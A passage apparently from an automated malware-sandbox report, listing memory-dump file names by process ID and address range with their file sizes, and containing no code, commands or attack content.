                                                                                                                                                                                                                                                                                                                            • memory/2176-347-0x0000000000400000-0x0000000000458000-memory.dmp
                                                                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                                                                              352KB

                                                                                                                                                                                                                                                                                                                            • memory/2176-349-0x0000000000400000-0x0000000000458000-memory.dmp
                                                                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                                                                              352KB

                                                                                                                                                                                                                                                                                                                            • memory/2224-809-0x0000000002A50000-0x0000000002A86000-memory.dmp
                                                                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                                                                              216KB

                                                                                                                                                                                                                                                                                                                            • memory/2224-858-0x00000000067F0000-0x000000000680A000-memory.dmp
                                                                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                                                                              104KB

                                                                                                                                                                                                                                                                                                                            • memory/2224-844-0x00000000068C0000-0x000000000690C000-memory.dmp
                                                                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                                                                              304KB

                                                                                                                                                                                                                                                                                                                            • memory/2224-857-0x00000000075E0000-0x0000000007676000-memory.dmp
                                                                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                                                                              600KB

                                                                                                                                                                                                                                                                                                                            • memory/2224-837-0x0000000006370000-0x000000000638E000-memory.dmp
                                                                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                                                                              120KB

                                                                                                                                                                                                                                                                                                                            • memory/2224-822-0x0000000005EE0000-0x0000000006234000-memory.dmp
                                                                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                                                                              3.3MB

                                                                                                                                                                                                                                                                                                                            • memory/2224-811-0x00000000053D0000-0x00000000053F2000-memory.dmp
                                                                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                                                                              136KB

                                                                                                                                                                                                                                                                                                                            • memory/2224-812-0x0000000005470000-0x00000000054D6000-memory.dmp
                                                                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                                                                              408KB

                                                                                                                                                                                                                                                                                                                            • memory/2224-810-0x0000000005590000-0x0000000005BB8000-memory.dmp
                                                                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                                                                              6.2MB

                                                                                                                                                                                                                                                                                                                            • memory/2224-859-0x0000000006850000-0x0000000006872000-memory.dmp
                                                                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                                                                              136KB

                                                                                                                                                                                                                                                                                                                            • memory/2228-307-0x0000000000740000-0x0000000000741000-memory.dmp
                                                                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                                                                              4KB

                                                                                                                                                                                                                                                                                                                            • memory/2264-139-0x0000000000400000-0x0000000000592000-memory.dmp
                                                                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                                                                              1.6MB

                                                                                                                                                                                                                                                                                                                            • memory/2496-181-0x00000000009D0000-0x00000000009D1000-memory.dmp
                                                                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                                                                              4KB

                                                                                                                                                                                                                                                                                                                            • memory/2496-179-0x00000000009D0000-0x00000000009D1000-memory.dmp
                                                                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                                                                              4KB

                                                                                                                                                                                                                                                                                                                            • memory/2680-806-0x0000000000370000-0x0000000000844000-memory.dmp
                                                                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                                                                              4.8MB

                                                                                                                                                                                                                                                                                                                            • memory/2680-63-0x0000000000370000-0x0000000000844000-memory.dmp
                                                                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                                                                              4.8MB

                                                                                                                                                                                                                                                                                                                            • memory/2680-283-0x0000000000370000-0x0000000000844000-memory.dmp
                                                                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                                                                              4.8MB

                                                                                                                                                                                                                                                                                                                            • memory/2680-639-0x0000000000370000-0x0000000000844000-memory.dmp
                                                                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                                                                              4.8MB

                                                                                                                                                                                                                                                                                                                            • memory/2680-500-0x0000000000370000-0x0000000000844000-memory.dmp
                                                                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                                                                              4.8MB

                                                                                                                                                                                                                                                                                                                            • memory/2680-765-0x0000000000370000-0x0000000000844000-memory.dmp
                                                                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                                                                              4.8MB

                                                                                                                                                                                                                                                                                                                            • memory/2680-533-0x0000000000370000-0x0000000000844000-memory.dmp
                                                                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                                                                              4.8MB

                                                                                                                                                                                                                                                                                                                            • memory/2748-795-0x0000000140000000-0x0000000140F7A000-memory.dmp
                                                                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                                                                              15.5MB

                                                                                                                                                                                                                                                                                                                            • memory/2748-657-0x0000000140000000-0x0000000140F7A000-memory.dmp
                                                                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                                                                              15.5MB

                                                                                                                                                                                                                                                                                                                            • memory/2748-656-0x0000000140000000-0x0000000140F7A000-memory.dmp
                                                                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                                                                              15.5MB

                                                                                                                                                                                                                                                                                                                            • memory/2984-941-0x0000000000140000-0x00000000007AE000-memory.dmp
                                                                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                                                                              6.4MB

                                                                                                                                                                                                                                                                                                                            • memory/3028-180-0x0000000000400000-0x0000000000458000-memory.dmp
                                                                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                                                                              352KB

                                                                                                                                                                                                                                                                                                                            • memory/3028-182-0x0000000000400000-0x0000000000458000-memory.dmp
                                                                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                                                                              352KB

                                                                                                                                                                                                                                                                                                                            • memory/3400-348-0x0000000000240000-0x0000000000241000-memory.dmp
                                                                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                                                                              4KB

                                                                                                                                                                                                                                                                                                                            • memory/3436-110-0x0000000000E80000-0x0000000000F22000-memory.dmp
                                                                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                                                                              648KB

                                                                                                                                                                                                                                                                                                                            • memory/3436-120-0x000000001BA70000-0x000000001BA92000-memory.dmp
                                                                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                                                                              136KB

                                                                                                                                                                                                                                                                                                                            • memory/3436-121-0x0000000003290000-0x000000000329A000-memory.dmp
                                                                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                                                                              40KB

                                                                                                                                                                                                                                                                                                                            • memory/3436-122-0x000000001E800000-0x000000001ED28000-memory.dmp
                                                                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                                                                              5.2MB

                                                                                                                                                                                                                                                                                                                            • memory/3436-123-0x000000001E4A0000-0x000000001E662000-memory.dmp
                                                                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                                                                              1.8MB

                                                                                                                                                                                                                                                                                                                            • memory/3436-251-0x000000001F050000-0x000000001F06C000-memory.dmp
                                                                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                                                                              112KB

                                                                                                                                                                                                                                                                                                                            • memory/3436-667-0x000000001CD50000-0x000000001CD62000-memory.dmp
                                                                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                                                                              72KB

                                                                                                                                                                                                                                                                                                                            • memory/3720-20-0x00000000006C0000-0x0000000000BEC000-memory.dmp
                                                                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                                                                              5.2MB

                                                                                                                                                                                                                                                                                                                            • memory/3720-30-0x00000000006C0000-0x0000000000BEC000-memory.dmp
                                                                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                                                                              5.2MB

                                                                                                                                                                                                                                                                                                                            • memory/3720-29-0x00000000006C0000-0x0000000000BEC000-memory.dmp
                                                                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                                                                              5.2MB

                                                                                                                                                                                                                                                                                                                            • memory/3720-28-0x00000000006C0000-0x0000000000BEC000-memory.dmp
                                                                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                                                                              5.2MB

                                                                                                                                                                                                                                                                                                                            • memory/3720-81-0x00000000006C0000-0x0000000000BEC000-memory.dmp
                                                                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                                                                              5.2MB

                                                                                                                                                                                                                                                                                                                            • memory/3720-24-0x00000000006C0000-0x0000000000BEC000-memory.dmp
                                                                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                                                                              5.2MB

                                                                                                                                                                                                                                                                                                                            • memory/3720-282-0x00000000006C0000-0x0000000000BEC000-memory.dmp
                                                                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                                                                              5.2MB

                                                                                                                                                                                                                                                                                                                            • memory/3720-25-0x00000000006C0000-0x0000000000BEC000-memory.dmp
                                                                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                                                                              5.2MB

                                                                                                                                                                                                                                                                                                                            • memory/3720-27-0x00000000006C0000-0x0000000000BEC000-memory.dmp
                                                                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                                                                              5.2MB

                                                                                                                                                                                                                                                                                                                            • memory/3720-26-0x00000000006C0000-0x0000000000BEC000-memory.dmp
                                                                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                                                                              5.2MB

                                                                                                                                                                                                                                                                                                                            • memory/3720-23-0x00000000006C0000-0x0000000000BEC000-memory.dmp
                                                                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                                                                              5.2MB

                                                                                                                                                                                                                                                                                                                            • memory/3768-84-0x00000000009D0000-0x000000000104A000-memory.dmp
                                                                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                                                                              6.5MB

                                                                                                                                                                                                                                                                                                                            • memory/3768-85-0x00000000009D0000-0x000000000104A000-memory.dmp
                                                                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                                                                              6.5MB

                                                                                                                                                                                                                                                                                                                            • memory/3768-88-0x00000000009D0000-0x000000000104A000-memory.dmp
                                                                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                                                                              6.5MB

                                                                                                                                                                                                                                                                                                                            • memory/3768-90-0x00000000009D0000-0x000000000104A000-memory.dmp
                                                                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                                                                              6.5MB

                                                                                                                                                                                                                                                                                                                            • memory/3768-91-0x00000000009D0000-0x000000000104A000-memory.dmp
                                                                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                                                                              6.5MB

                                                                                                                                                                                                                                                                                                                            • memory/3768-86-0x00000000009D0000-0x000000000104A000-memory.dmp
                                                                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                                                                              6.5MB

                                                                                                                                                                                                                                                                                                                            • memory/3768-284-0x00000000009D0000-0x000000000104A000-memory.dmp
                                                                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                                                                              6.5MB

                                                                                                                                                                                                                                                                                                                            • memory/3768-87-0x00000000009D0000-0x000000000104A000-memory.dmp
                                                                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                                                                              6.5MB

                                                                                                                                                                                                                                                                                                                            • memory/3768-83-0x00000000009D0000-0x000000000104A000-memory.dmp
                                                                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                                                                              6.5MB

                                                                                                                                                                                                                                                                                                                            • memory/3768-89-0x00000000009D0000-0x000000000104A000-memory.dmp
                                                                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                                                                              6.5MB

                                                                                                                                                                                                                                                                                                                            • memory/4156-445-0x0000000000250000-0x0000000000268000-memory.dmp
                                                                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                                                                              96KB

                                                                                                                                                                                                                                                                                                                            • memory/4164-225-0x0000000000700000-0x0000000000752000-memory.dmp
                                                                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                                                                              328KB

                                                                                                                                                                                                                                                                                                                            • memory/4244-185-0x0000000000D40000-0x0000000000E00000-memory.dmp
                                                                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                                                                              768KB

                                                                                                                                                                                                                                                                                                                            • memory/4596-61-0x0000000000BA0000-0x0000000001074000-memory.dmp
                                                                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                                                                              4.8MB

                                                                                                                                                                                                                                                                                                                            • memory/4596-49-0x0000000077BA4000-0x0000000077BA6000-memory.dmp
                                                                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                                                                              8KB

                                                                                                                                                                                                                                                                                                                            • memory/4596-47-0x0000000000BA0000-0x0000000001074000-memory.dmp
                                                                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                                                                              4.8MB

                                                                                                                                                                                                                                                                                                                            • memory/4632-308-0x0000000000400000-0x000000000063B000-memory.dmp
                                                                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                                                                              2.2MB

                                                                                                                                                                                                                                                                                                                            • memory/4632-306-0x0000000000400000-0x000000000063B000-memory.dmp
                                                                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                                                                              2.2MB

                                                                                                                                                                                                                                                                                                                            • memory/4860-228-0x0000000006930000-0x000000000696C000-memory.dmp
                                                                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                                                                              240KB

                                                                                                                                                                                                                                                                                                                            • memory/4860-177-0x00000000057A0000-0x0000000005D44000-memory.dmp
                                                                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                                                                              5.6MB

                                                                                                                                                                                                                                                                                                                            • memory/4860-434-0x0000000007E70000-0x0000000007EC0000-memory.dmp
                                                                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                                                                              320KB

                                                                                                                                                                                                                                                                                                                            • memory/4860-383-0x0000000007FF0000-0x000000000851C000-memory.dmp
                                                                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                                                                              5.2MB

                                                                                                                                                                                                                                                                                                                            • memory/4860-382-0x00000000078F0000-0x0000000007AB2000-memory.dmp
                                                                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                                                                              1.8MB

                                                                                                                                                                                                                                                                                                                            • memory/4860-328-0x0000000006BE0000-0x0000000006C46000-memory.dmp
                                                                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                                                                              408KB

                                                                                                                                                                                                                                                                                                                            • memory/4860-229-0x0000000006AA0000-0x0000000006AEC000-memory.dmp
                                                                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                                                                              304KB

                                                                                                                                                                                                                                                                                                                            • memory/4860-226-0x0000000006990000-0x0000000006A9A000-memory.dmp
                                                                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                                                                              1.0MB

                                                                                                                                                                                                                                                                                                                            • memory/4860-227-0x00000000068D0000-0x00000000068E2000-memory.dmp
                                                                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                                                                              72KB

                                                                                                                                                                                                                                                                                                                            • memory/4860-224-0x0000000006D00000-0x0000000007318000-memory.dmp
                                                                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                                                                              6.1MB

                                                                                                                                                                                                                                                                                                                            • memory/4860-211-0x00000000065C0000-0x00000000065DE000-memory.dmp
                                                                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                                                                              120KB

                                                                                                                                                                                                                                                                                                                            • memory/4860-202-0x0000000005DD0000-0x0000000005E46000-memory.dmp
                                                                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                                                                              472KB

                                                                                                                                                                                                                                                                                                                            • memory/4860-183-0x0000000002B50000-0x0000000002B5A000-memory.dmp
                                                                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                                                                              40KB

                                                                                                                                                                                                                                                                                                                            • memory/4860-176-0x0000000000860000-0x00000000008B2000-memory.dmp
                                                                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                                                                              328KB

                                                                                                                                                                                                                                                                                                                            • memory/4860-178-0x00000000051F0000-0x0000000005282000-memory.dmp
                                                                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                                                                              584KB

                                                                                                                                                                                                                                                                                                                            • memory/5356-882-0x0000017AA2950000-0x0000017AA2A05000-memory.dmp
                                                                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                                                                              724KB

                                                                                                                                                                                                                                                                                                                            • memory/5356-881-0x0000017AA2930000-0x0000017AA294C000-memory.dmp
                                                                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                                                                              112KB

                                                                                                                                                                                                                                                                                                                            • memory/5356-884-0x0000017AA2920000-0x0000017AA292A000-memory.dmp
                                                                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                                                                              40KB

                                                                                                                                                                                                                                                                                                                            • memory/5356-887-0x0000017AA2B50000-0x0000017AA2B5A000-memory.dmp
                                                                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                                                                              40KB

                                                                                                                                                                                                                                                                                                                            • memory/5356-888-0x0000017AA2BB0000-0x0000017AA2BCA000-memory.dmp
                                                                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                                                                              104KB

                                                                                                                                                                                                                                                                                                                            • memory/5356-889-0x0000017AA2B60000-0x0000017AA2B68000-memory.dmp
                                                                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                                                                              32KB

                                                                                                                                                                                                                                                                                                                            • memory/5356-890-0x0000017AA2B90000-0x0000017AA2B96000-memory.dmp
                                                                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                                                                              24KB

                                                                                                                                                                                                                                                                                                                            • memory/5356-891-0x0000017AA2BA0000-0x0000017AA2BAA000-memory.dmp
                                                                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                                                                              40KB

                                                                                                                                                                                                                                                                                                                            • memory/5392-886-0x00000000002A0000-0x000000000090E000-memory.dmp
                                                                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                                                                              6.4MB

                                                                                                                                                                                                                                                                                                                            • memory/5552-796-0x00000000002A0000-0x000000000090E000-memory.dmp
                                                                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                                                                              6.4MB

                                                                                                                                                                                                                                                                                                                            • memory/5552-1042-0x00000000002A0000-0x000000000090E000-memory.dmp
                                                                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                                                                              6.4MB